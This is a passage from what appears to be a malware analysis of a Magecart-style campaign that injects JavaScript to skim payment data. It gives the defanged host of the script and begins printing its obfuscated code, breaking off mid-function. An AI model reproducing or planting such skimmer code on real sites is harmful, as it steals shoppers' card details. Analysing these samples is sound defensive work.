Starting Point It all began with a tweet: sdcyberresearch on X This tweet hinted at a Magecart-style campaign involving malicious JavaScript injection to skim payment data. Initial Sample The script was hosted at: https://www.cc-analytics[.]com/app.js The original code was heavily obfuscated: (function() { function _0x1B3A1(_0x1B563, _0x1B3FB, _0x1B455, _0x1B509, _0x1B4AF, _0x1B5BD) { _0x1B4AF = function(_0x1B3A1) { return (_0x1B3A1 < _0x1B3FB ? '' : _0x1B4AF(parseInt(_0x1B3A1 / _0x1B3FB))) + ((_0x1B3A1 = _0x1B3A1 % _0x1B3FB) > 35 ?